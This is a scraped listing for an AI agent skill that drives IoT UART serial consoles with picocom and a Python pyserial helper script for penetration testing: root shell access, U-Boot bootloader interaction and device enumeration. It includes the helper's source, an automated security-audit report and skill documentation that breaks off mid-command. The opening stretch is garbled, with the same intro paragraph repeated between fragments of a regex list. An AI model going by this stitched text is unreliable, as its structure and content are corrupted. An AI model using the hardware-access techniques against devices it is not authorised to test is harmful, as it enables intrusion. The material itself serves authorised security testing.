IoT UART Console (picocom) This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery. Prerequisites - picocom must be installed on the system - Python 3 with pyserial library ( on Arch, or ) - UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.) - Appropriate permissions to access serial devices (typically /dev/ttyUSB or /dev/ttyACM ) Recommended Approach: Serial He…

, # # or $\n r'root@[^#]+#', # root@device#\n r'=>\\s*

IoT UART Console (picocom) This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery. Prerequisites - picocom must be installed on the system - Python 3 with pyserial library ( on Arch, or ) - UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.) - Appropriate permissions to access serial devices (typically /dev/ttyUSB or /dev/ttyACM ) Recommended Approach: Serial He…

, # U-Boot =>\n r'U-Boot>', # U-Boot>\n r'>\\s*

IoT UART Console (picocom) This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery. Prerequisites - picocom must be installed on the system - Python 3 with pyserial library ( on Arch, or ) - UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.) - Appropriate permissions to access serial devices (typically /dev/ttyUSB or /dev/ttyACM ) Recommended Approach: Serial He…

, # Generic >\n r'login:\\s*

IoT UART Console (picocom) This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery. Prerequisites - picocom must be installed on the system - Python 3 with pyserial library ( on Arch, or ) - UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.) - Appropriate permissions to access serial devices (typically /dev/ttyUSB or /dev/ttyACM ) Recommended Approach: Serial He…

, # Login prompt\n r'Password:\\s*

IoT UART Console (picocom) This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery. Prerequisites - picocom must be installed on the system - Python 3 with pyserial library ( on Arch, or ) - UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.) - Appropriate permissions to access serial devices (typically /dev/ttyUSB or /dev/ttyACM ) Recommended Approach: Serial He…

, # Password prompt\n ]\n\n def __init__(self, device: str, baud: int = 115200, timeout: float = 3.0,\n prompt_pattern: Optional[str] = None, debug: bool = False,\n logfile: Optional[str] = None):\n \"\"\"\n Initialize serial helper.\n\n Args:\n device: Serial device path (e.g., /dev/ttyUSB0)\n baud: Baud rate (default: 115200)\n timeout: Read timeout in seconds (default: 3.0)\n prompt_pattern: Custom regex pattern for prompt detection\n debug: Enable debug output\n logfile: Optional file path to log all I/O\n \"\"\"\n self.device = device\n self.baud = baud\n self.timeout = timeout\n self.debug = debug\n self.serial = None\n self.detected_prompt = None\n self.logfile = None\n\n # Setup prompt patterns\n if prompt_pattern:\n self.prompt_patterns = [re.compile(prompt_pattern)]\n else:\n self.prompt_patterns = [re.compile(p) for p in self.DEFAULT_PROMPT_PATTERNS]\n\n # Track command history\n self.command_history = []\n\n # Open logfile if specified\n if logfile:\n try:\n self.logfile = open(logfile, 'a', buffering=1) # Line buffered\n self._log(f\"\\n{'='*60}\\n\")\n self._log(f\"Session started: {datetime.now().isoformat()}\\n\")\n self._log(f\"Device: {device} @ {baud} baud\\n\")\n self._log(f\"{'='*60}\\n\")\n except IOError as e:\n print(f\"Warning: Could not open logfile {logfile}: {e}\", file=sys.stderr)\n self.logfile = None\n\n def _debug_print(self, msg: str):\n \"\"\"Print debug message if debug mode is enabled.\"\"\"\n if self.debug:\n print(f\"[DEBUG] {msg}\", file=sys.stderr)\n\n def _log(self, data: str):\n \"\"\"Write data to logfile if enabled.\"\"\"\n if self.logfile:\n self.logfile.write(data)\n self.logfile.flush()\n\n def connect(self) -> bool:\n \"\"\"\n Establish serial connection.\n\n Returns:\n True if connection successful, False otherwise\n \"\"\"\n try:\n self._debug_print(f\"Connecting to {self.device} at {self.baud} baud...\")\n self.serial = serial.Serial(\n port=self.device,\n baudrate=self.baud,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n timeout=self.timeout,\n xonxoff=False,\n rtscts=False,\n dsrdtr=False\n )\n\n # Clear any existing data\n self.serial.reset_input_buffer()\n self.serial.reset_output_buffer()\n\n # Send a newline to get initial prompt\n self._send_raw(\"\\r\\n\")\n time.sleep(0.5)\n\n # Try to detect prompt\n initial_output = self._read_raw(timeout=1.0)\n self._detect_prompt(initial_output)\n\n self._debug_print(f\"Connected successfully. Detected prompt: {self.detected_prompt}\")\n return True\n\n except serial.SerialException as e:\n print(f\"Error connecting to {self.device}: {e}\", file=sys.stderr)\n return False\n except Exception as e:\n print(f\"Unexpected error: {e}\", file=sys.stderr)\n return False\n\n def disconnect(self):\n \"\"\"Close serial connection.\"\"\"\n if self.serial and self.serial.is_open:\n self._debug_print(\"Disconnecting...\")\n self.serial.close()\n self.serial = None\n\n if self.logfile:\n self._log(f\"\\n{'='*60}\\n\")\n self._log(f\"Session ended: {datetime.now().isoformat()}\\n\")\n self._log(f\"{'='*60}\\n\\n\")\n self.logfile.close()\n self.logfile = None\n\n def _send_raw(self, data: str):\n \"\"\"Send raw data to serial port.\"\"\"\n if self.serial and self.serial.is_open:\n self.serial.write(data.encode('utf-8'))\n self.serial.flush()\n self._log(data) # Log sent data\n\n def _read_raw(self, timeout: Optional[float] = None) -> str:\n \"\"\"\n Read raw data from serial port.\n\n Args:\n timeout: Optional custom timeout for this read\n\n Returns:\n Decoded string from serial port\n \"\"\"\n if not self.serial or not self.serial.is_open:\n return \"\"\n\n original_timeout = self.serial.timeout\n if timeout is not None:\n self.serial.timeout = timeout\n\n try:\n output = b\"\"\n start_time = time.time()\n while True:\n if self.serial.in_waiting:\n chunk = self.serial.read(self.serial.in_waiting)\n output += chunk\n self._debug_print(f\"Read {len(chunk)} bytes\")\n else:\n # Check if we've exceeded timeout\n if time.time() - start_time > (timeout or self.timeout):\n break\n time.sleep(0.05)\n\n decoded = output.decode('utf-8', errors='replace')\n self._log(decoded) # Log received data\n return decoded\n finally:\n self.serial.timeout = original_timeout\n\n def _detect_prompt(self, text: str):\n \"\"\"\n Detect prompt pattern in text.\n\n Args:\n text: Text to search for prompt\n \"\"\"\n lines = text.split('\\n')\n for line in reversed(lines):\n line = line.strip()\n if line:\n for pattern in self.prompt_patterns:\n if pattern.search(line):\n self.detected_prompt = pattern.pattern\n self._debug_print(f\"Detected prompt pattern: {self.detected_prompt}\")\n return\n\n def _wait_for_prompt(self, timeout: Optional[float] = None) -> Tuple[str, bool]:\n \"\"\"\n Read until prompt is detected or timeout occurs.\n\n Args:\n timeout: Optional custom timeout\n\n Returns:\n Tuple of (output, prompt_found)\n \"\"\"\n output = \"\"\n start_time = time.time()\n timeout_val = timeout or self.timeout\n\n while True:\n chunk = self._read_raw(timeout=0.1)\n if chunk:\n output += chunk\n self._debug_print(f\"Accumulated {len(output)} chars\")\n\n # Check if prompt is in the output\n for pattern in self.prompt_patterns:\n if pattern.search(output.split('\\n')[-1]):\n self._debug_print(\"Prompt detected\")\n return output, True\n\n # Check timeout\n if time.time() - start_time > timeout_val:\n self._debug_print(\"Timeout waiting for prompt\")\n return output, False\n\n time.sleep(0.05)\n\n def _clean_output(self, raw_output: str, command: str) -> str:\n \"\"\"\n Clean command output by removing echoes, prompts, and ANSI codes.\n\n Args:\n raw_output: Raw output from serial\n command: Command that was sent\n\n Returns:\n Cleaned output\n \"\"\"\n # Remove ANSI escape codes\n ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n cleaned = ansi_escape.sub('', raw_output)\n\n # Split into lines\n lines = cleaned.split('\\n')\n\n # Remove empty lines and prompts\n result_lines = []\n for line in lines:\n line = line.strip('\\r\\n')\n\n # Skip empty lines\n if not line.strip():\n continue\n\n # Skip lines that are just the command echo\n if line.strip() == command.strip():\n continue\n\n # Skip lines that match prompt patterns\n is_prompt = False\n for pattern in self.prompt_patterns:\n if pattern.search(line):\n is_prompt = True\n break\n if is_prompt:\n continue\n\n result_lines.append(line)\n\n return '\\n'.join(result_lines)\n\n def send_command(self, command: str, timeout: Optional[float] = None,\n clean: bool = True) -> Tuple[str, bool]:\n \"\"\"\n Send command and wait for output.\n\n Args:\n command: Command to send\n timeout: Optional custom timeout\n clean: Whether to clean the output (remove echoes, prompts)\n\n Returns:\n Tuple of (output, success)\n \"\"\"\n if not self.serial or not self.serial.is_open:\n return \"\", False\n\n self._debug_print(f\"Sending command: {command}\")\n\n # Clear input buffer\n self.serial.reset_input_buffer()\n\n # Send command with carriage return\n self._send_raw(f\"{command}\\r\\n\")\n\n # Small delay to let command be processed\n time.sleep(0.1)\n\n # Wait for prompt\n raw_output, prompt_found = self._wait_for_prompt(timeout)\n\n # Track command\n self.command_history.append({\n 'command': command,\n 'timestamp': datetime.now().isoformat(),\n 'success': prompt_found,\n 'raw_output': raw_output[:200] + '...' if len(raw_output) > 200 else raw_output\n })\n\n # Clean output if requested\n if clean:\n output = self._clean_output(raw_output, command)\n else:\n output = raw_output\n\n self._debug_print(f\"Command completed. Success: {prompt_found}\")\n return output, prompt_found\n\n def send_commands(self, commands: List[str], delay: float = 0.5) -> List[dict]:\n \"\"\"\n Send multiple commands in sequence.\n\n Args:\n commands: List of commands to send\n delay: Delay between commands in seconds\n\n Returns:\n List of dictionaries with command results\n \"\"\"\n results = []\n for command in commands:\n output, success = self.send_command(command)\n results.append({\n 'command': command,\n 'output': output,\n 'success': success\n })\n if delay > 0:\n time.sleep(delay)\n return results\n\n def interactive_mode(self):\n \"\"\"\n Enter interactive mode where user can type commands.\n Type 'exit' or Ctrl-C to quit.\n \"\"\"\n print(f\"Interactive mode - connected to {self.device}\")\n print(\"Type 'exit' or press Ctrl-C to quit\")\n print(\"-\" * 50)\n\n try:\n while True:\n try:\n command = input(\">>> \")\n if command.strip().lower() in ('exit', 'quit'):\n break\n\n if not command.strip():\n continue\n\n output, success = self.send_command(command)\n print(output)\n\n if not success:\n print(\"[WARNING] Command may have timed out or failed\", file=sys.stderr)\n\n except EOFError:\n break\n\n except KeyboardInterrupt:\n print(\"\\nExiting interactive mode...\")\n\n\ndef main():\n \"\"\"Main entry point for command-line usage.\"\"\"\n parser = argparse.ArgumentParser(\n description='Serial Helper for IoT UART Console Interaction',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n # Single command\n %(prog)s --device /dev/ttyUSB0 --command \"help\"\n\n # Interactive mode\n %(prog)s --device /dev/ttyUSB0 --interactive\n\n # Batch commands from file\n %(prog)s --device /dev/ttyUSB0 --script commands.txt\n\n # Custom baud rate and timeout\n %(prog)s --device /dev/ttyUSB0 --baud 57600 --timeout 5 --command \"ps\"\n\n # Raw output (no cleaning)\n %(prog)s --device /dev/ttyUSB0 --command \"help\" --raw\n\n # JSON output for scripting\n %(prog)s --device /dev/ttyUSB0 --command \"help\" --json\n\n # Log all I/O to file (tail -f in another terminal to watch)\n %(prog)s --device /dev/ttyUSB0 --command \"help\" --logfile session.log\n \"\"\"\n )\n\n # Connection arguments\n parser.add_argument('--device', '-d', default='/dev/ttyUSB0',\n help='Serial device path (default: /dev/ttyUSB0)')\n parser.add_argument('--baud', '-b', type=int, default=115200,\n help='Baud rate (default: 115200)')\n parser.add_argument('--timeout', '-t', type=float, default=3.0,\n help='Read timeout in seconds (default: 3.0)')\n parser.add_argument('--prompt', '-p', type=str,\n help='Custom prompt regex pattern')\n\n # Mode arguments (mutually exclusive)\n mode_group = parser.add_mutually_exclusive_group(required=True)\n mode_group.add_argument('--command', '-c', type=str,\n help='Single command to execute')\n mode_group.add_argument('--interactive', '-i', action='store_true',\n help='Enter interactive mode')\n mode_group.add_argument('--script', '-s', type=str,\n help='File containing commands to execute (one per line)')\n\n # Output arguments\n parser.add_argument('--raw', '-r', action='store_true',\n help='Output raw response (no cleaning)')\n parser.add_argument('--json', '-j', action='store_true',\n help='Output in JSON format')\n parser.add_argument('--logfile', '-l', type=str,\n help='Log all I/O to file (can tail -f in another terminal)')\n parser.add_argument('--debug', action='store_true',\n help='Enable debug output')\n\n args = parser.parse_args()\n\n # Create serial helper\n helper = SerialHelper(\n device=args.device,\n baud=args.baud,\n timeout=args.timeout,\n prompt_pattern=args.prompt,\n debug=args.debug,\n logfile=args.logfile\n )\n\n # Connect to device\n if not helper.connect():\n sys.exit(1)\n\n try:\n if args.interactive:\n # Interactive mode\n helper.interactive_mode()\n\n elif args.command:\n # Single command mode\n output, success = helper.send_command(args.command, clean=not args.raw)\n\n if args.json:\n result = {\n 'command': args.command,\n 'output': output,\n 'success': success\n }\n print(json.dumps(result, indent=2))\n else:\n print(output)\n\n sys.exit(0 if success else 1)\n\n elif args.script:\n # Batch script mode\n try:\n with open(args.script, 'r') as f:\n commands = [line.strip() for line in f if line.strip() and not line.startswith('#')]\n\n results = helper.send_commands(commands)\n\n if args.json:\n print(json.dumps(results, indent=2))\n else:\n for i, result in enumerate(results, 1):\n print(f\"\\n{'='*50}\")\n print(f\"Command {i}: {result['command']}\")\n print(f\"{'='*50}\")\n print(result['output'])\n if not result['success']:\n print(\"[WARNING] Command may have failed\", file=sys.stderr)\n\n # Exit with error if any command failed\n if not all(r['success'] for r in results):\n sys.exit(1)\n\n except FileNotFoundError:\n print(f\"Error: Script file '{args.script}' not found\", file=sys.stderr)\n sys.exit(1)\n except IOError as e:\n print(f\"Error reading script file: {e}\", file=sys.stderr)\n sys.exit(1)\n\n finally:\n helper.disconnect()\n\n\nif __name__ == '__main__':\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":17030,"content_sha256":"42a43acf23b7bebd21130ba22dfe2521a0adb97dafd73ac3ee1144af205ad94d"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T19:59:22.436Z\",\n \"slug\": \"brownfinesecurity-iot-uart-console-picocom\",\n \"source_url\": \"https://github.com/BrownFineSecurity/picocom-claude-skill/tree/master/.claude/skills/picocom\",\n \"source_ref\": \"master\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"256f71f2da9961dfc2576b6a149eac361f098729fc7882a252a9d54afb1602fb\",\n \"tree_hash\": \"77ed060424ac2f134dc40a60ff0de0dfbb19c622b80c4b4aef47ab10cb90dd7c\"\n },\n \"skill\": {\n \"name\": \"iot-uart-console-picocom\",\n \"description\": \"Use picocom to interact with IoT device UART consoles for pentesting operations including device enumeration, vulnerability discovery, bootloader manipulation, and gaining root shells. Use when the user needs to interact with embedded devices, IoT hardware, or serial consoles.\",\n \"summary\": \"Use picocom to interact with IoT device UART consoles for pentesting operations including device enu...\",\n \"icon\": \"🔌\",\n \"version\": \"1.0.0\",\n \"author\": \"BrownFineSecurity\",\n \"license\": \"MIT\",\n \"category\": \"security\",\n \"tags\": [\n \"iot\",\n \"embedded\",\n \"pentesting\",\n \"serial\",\n \"uart\"\n ],\n \"supported_tools\": [\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"scripts\",\n \"filesystem\",\n \"external_commands\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"This skill is a legitimate security testing tool for authorized IoT device penetration testing via UART serial connections. The core implementation (serial_helper.py) uses pyserial for serial communication and logs all I/O to files. The extensive static findings are false positives: they detect pentesting documentation showing commands to run on target IoT devices via serial console, not malicious code execution on the host system. No network calls to external servers, credential theft, or host code execution capabilities were found.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"scripts\",\n \"evidence\": [\n {\n \"file\": \"serial_helper.py\",\n \"line_start\": 1,\n \"line_end\": 518\n }\n ]\n },\n {\n \"factor\": \"filesystem\",\n \"evidence\": [\n {\n \"file\": \"serial_helper.py\",\n \"line_start\": 67,\n \"line_end\": 76\n },\n {\n \"file\": \"serial_helper.py\",\n \"line_start\": 485,\n \"line_end\": 486\n }\n ]\n },\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 182,\n \"line_end\": 184\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 640,\n \"line_end\": 641\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 5,\n \"total_lines\": 2275,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T19:59:22.436Z\"\n },\n \"content\": {\n \"user_title\": \"Access IoT device serial consoles for security testing\",\n \"value_statement\": \"IoT devices often expose UART serial consoles that provide direct access to firmware, bootloaders, and root shells. This skill enables security testers to connect to and interact with these consoles using picocom for authorized penetration testing and vulnerability research.\",\n \"seo_keywords\": [\n \"IoT UART console\",\n \"picocom skill\",\n \"serial console access\",\n \"embedded device testing\",\n \"UART penetration testing\",\n \"IoT security testing\",\n \"bootloader exploitation\",\n \"device enumeration\",\n \"Claude Code skill\",\n \"embedded security\"\n ],\n \"actual_capabilities\": [\n \"Connect to IoT devices via USB-to-serial adapters using picocom\",\n \"Execute commands on target devices through a Python serial helper script\",\n \"Detect device prompts and handle UART communication automatically\",\n \"Log all serial I/O sessions for monitoring and documentation\",\n \"Support for U-Boot bootloader interaction and root shell access\",\n \"Batch command execution and interactive mode for flexible testing\"\n ],\n \"limitations\": [\n \"Requires physical access to device UART pins via USB-to-serial adapter\",\n \"Does not bypass hardware security or encrypted firmware\",\n \"Authorized testing required - only test devices you own or have permission to assess\",\n \"Skill does not perform automated exploitation - requires user guidance\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security researchers\",\n \"title\": \"Firmware vulnerability research\",\n \"description\": \"Extract and analyze firmware from IoT devices to discover security flaws and hardcoded credentials\"\n },\n {\n \"target_user\": \"Penetration testers\",\n \"title\": \"Device security assessment\",\n \"description\": \"Conduct authorized security tests on embedded devices including privilege escalation and bootloader analysis\"\n },\n {\n \"target_user\": \"Hardware hackers\",\n \"title\": \"Device root shell access\",\n \"description\": \"Gain shell access to IoT devices for debugging, customization, or security analysis\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Basic connection\",\n \"scenario\": \"Connect to IoT device\",\n \"prompt\": \"Connect to my IoT device at /dev/ttyUSB0 with 115200 baud and enumerate the system\"\n },\n {\n \"title\": \"With logging\",\n \"scenario\": \"Monitor session activity\",\n \"prompt\": \"Run serial commands with logging to /tmp/device_enum.log so I can monitor the session in another terminal\"\n },\n {\n \"title\": \"Bootloader access\",\n \"scenario\": \"Access U-Boot bootloader\",\n \"prompt\": \"Connect to the device and help me interrupt the boot process to access the U-Boot bootloader console\"\n },\n {\n \"title\": \"Batch enumeration\",\n \"scenario\": \"Automated device checks\",\n \"prompt\": \"Run a batch of enumeration commands including uname, ifconfig, ps, and check for SUID binaries\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"Connect to the IoT device and enumerate system information\",\n \"output\": [\n \"Connected to /dev/ttyUSB0 at 115200 baud\",\n \"Detected prompt: User@[^>]+>\",\n \"System information:\",\n \"- Kernel: Linux 3.10.14 #1 SMP PREEMPT\",\n \"- BusyBox available with 212 commands\",\n \"- User: root (UID 0)\",\n \"- Network: eth0 at 192.168.1.27\"\n ]\n }\n ],\n \"best_practices\": [\n \"Always use session logging to monitor serial I/O activity in real-time\",\n \"Document all commands and findings for penetration testing reports\",\n \"Verify you have explicit authorization before testing any device\"\n ],\n \"anti_patterns\": [\n \"Do not test devices without proper authorization - this is illegal\",\n \"Avoid making permanent modifications without backing up original configurations\",\n \"Do not rely on default credentials as the only access method\"\n ],\n \"faq\": [\n {\n \"question\": \"What baud rate should I use?\",\n \"answer\": \"115200 is the most common baud rate for IoT devices. Try 57600, 38400, 19200, or 9600 if output appears garbled.\"\n },\n {\n \"question\": \"How do I monitor what Claude is doing?\",\n \"answer\": \"Use the --logfile option to write all I/O to a file, then run tail -f in another terminal to watch in real-time.\"\n },\n {\n \"question\": \"Is this skill safe to use?\",\n \"answer\": \"Yes. The skill logs all activity and does not execute commands automatically. All commands require user approval.\"\n },\n {\n \"question\": \"What serial devices are supported?\",\n \"answer\": \"The skill supports /dev/ttyUSB*, /dev/ttyACM*, and /dev/ttyS* device files for USB-to-serial adapters and built-in ports.\"\n },\n {\n \"question\": \"Does this work with all IoT devices?\",\n \"answer\": \"Only devices with accessible UART console pins. Some devices may have protected bootloaders or require physical pin connection.\"\n },\n {\n \"question\": \"How is this different from other serial tools?\",\n \"answer\": \"This skill provides a Python helper script with prompt detection, output cleaning, and session logging for reliable automation.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"examples.md\",\n \"type\": \"file\",\n \"path\": \"examples.md\",\n \"lines\": 489\n },\n {\n \"name\": \"OBSERVING_SESSIONS.md\",\n \"type\": \"file\",\n \"path\": \"OBSERVING_SESSIONS.md\",\n \"lines\": 371\n },\n {\n \"name\": \"serial_helper.py\",\n \"type\": \"file\",\n \"path\": \"serial_helper.py\",\n \"lines\": 518\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 659\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":9178,"content_sha256":"07340b78ec43240812ad525354ad5ac8f578494297f8ecbae387b8f4d5d0986a"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"IoT UART Console (picocom)","type":"text"}]},{"type":"paragraph","content":[{"text":"This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"picocom must be installed on the system","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python 3 with pyserial library (","type":"text"},{"text":"sudo pacman -S python-pyserial","type":"text","marks":[{"type":"code_inline"}]},{"text":" on Arch, or ","type":"text"},{"text":"pip install pyserial","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Appropriate permissions to access serial devices (typically /dev/ttyUSB* or /dev/ttyACM*)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Recommended Approach: Serial Helper Script","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": This skill includes a Python helper script (","type":"text"},{"text":"serial_helper.py","type":"text","marks":[{"type":"code_inline"}]},{"text":") that provides a clean, reliable interface for serial communication. ","type":"text"},{"text":"This is the RECOMMENDED method","type":"text","marks":[{"type":"strong"}]},{"text":" for interacting with IoT devices.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Default Session Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"ALL commands run by Claude will be logged to ","type":"text","marks":[{"type":"strong"}]},{"text":"/tmp/serial_session.log","type":"text","marks":[{"type":"code_inline"},{"type":"strong"}]},{"text":" by default.","type":"text","marks":[{"type":"strong"}]}]},{"type":"paragraph","content":[{"text":"To observe what Claude is doing in real-time:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# In a separate terminal, run:\ntail -f /tmp/serial_session.log","type":"text"}]},{"type":"paragraph","content":[{"text":"This allows you to watch all serial I/O as it happens without interfering with the connection.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Why Use the Serial Helper?","type":"text"}]},{"type":"paragraph","content":[{"text":"The helper script solves many problems with direct picocom usage:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Clean output","type":"text","marks":[{"type":"strong"}]},{"text":": Automatically removes command echoes, prompts, and ANSI codes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Prompt detection","type":"text","marks":[{"type":"strong"}]},{"text":": Automatically detects and waits for device prompts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timeout handling","type":"text","marks":[{"type":"strong"}]},{"text":": Proper timeout management with no arbitrary sleeps","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Easy scripting","type":"text","marks":[{"type":"strong"}]},{"text":": Simple command-line interface for single commands or batch operations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session logging","type":"text","marks":[{"type":"strong"}]},{"text":": All I/O logged to ","type":"text"},{"text":"/tmp/serial_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" for observation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reliable","type":"text","marks":[{"type":"strong"}]},{"text":": No issues with TTY requirements or background processes","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Quick Start with Serial Helper","type":"text"}]},{"type":"paragraph","content":[{"text":"Single Command:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/picocom/serial_helper.py --device /dev/ttyUSB0 --command \"help\"","type":"text"}]},{"type":"paragraph","content":[{"text":"With Custom Prompt (recommended for known devices):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/picocom/serial_helper.py --device /dev/ttyUSB0 --prompt \"User@[^>]+>\" --command \"ifconfig\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Interactive Mode:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/picocom/serial_helper.py --device /dev/ttyUSB0 --interactive","type":"text"}]},{"type":"paragraph","content":[{"text":"Batch Commands from File:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create a file with commands (one per line)\necho -e \"help\\ndate\\nifconfig\\nps\" > commands.txt\npython3 .claude/skills/picocom/serial_helper.py --device /dev/ttyUSB0 --script commands.txt","type":"text"}]},{"type":"paragraph","content":[{"text":"JSON Output (for parsing):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/picocom/serial_helper.py --device /dev/ttyUSB0 --command \"help\" --json","type":"text"}]},{"type":"paragraph","content":[{"text":"Debug Mode:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/picocom/serial_helper.py --device /dev/ttyUSB0 --command \"help\" --debug","type":"text"}]},{"type":"paragraph","content":[{"text":"Session Logging (for observation):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Terminal 1 - Run with logging\npython3 .claude/skills/picocom/serial_helper.py \\\n --device /dev/ttyUSB0 \\\n --prompt \"User@[^>]+>\" \\\n --logfile /tmp/session.log \\\n --interactive\n\n# Terminal 2 - Watch the session in real-time\ntail -f /tmp/session.log","type":"text"}]},{"type":"paragraph","content":[{"text":"Note:","type":"text","marks":[{"type":"strong"}]},{"text":" See ","type":"text"},{"text":"OBSERVING_SESSIONS.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for comprehensive guide on monitoring serial sessions.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Serial Helper Options","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Required (one of):\n --command, -c CMD Execute single command\n --interactive, -i Enter interactive mode\n --script, -s FILE Execute commands from file\n\nConnection Options:\n --device, -d DEV Serial device (default: /dev/ttyUSB0)\n --baud, -b RATE Baud rate (default: 115200)\n --timeout, -t SECONDS Command timeout (default: 3.0)\n --prompt, -p PATTERN Custom prompt regex pattern\n\nOutput Options:\n --raw, -r Don't clean output (show echoes, prompts)\n --json, -j Output in JSON format\n --logfile, -l FILE Log all I/O to file (can tail -f in another terminal)\n --debug Show debug information","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Common Prompt Patterns","type":"text"}]},{"type":"paragraph","content":[{"text":"The helper script includes common prompt patterns, but you can specify custom ones:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Uniview camera\n--prompt \"User@[^>]+>\"\n\n# Standard root/user prompts\n--prompt \"[#\\$]\\s*$\"\n\n# U-Boot bootloader\n--prompt \"=>\\s*$\"\n\n# Custom device\n--prompt \"MyDevice>\"","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Device Enumeration Example with Serial Helper","type":"text"}]},{"type":"paragraph","content":[{"text":"Here's a complete example of safely enumerating a device:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Set variables for convenience\nHELPER=\"python3 .claude/skills/picocom/serial_helper.py\"\nDEVICE=\"/dev/ttyUSB0\"\nPROMPT=\"User@[^>]+>\" # Adjust for your device\nLOGFILE=\"/tmp/serial_session.log\"\n\n# Get available commands\n$HELPER --device $DEVICE --prompt \"$PROMPT\" --logfile \"$LOGFILE\" --command 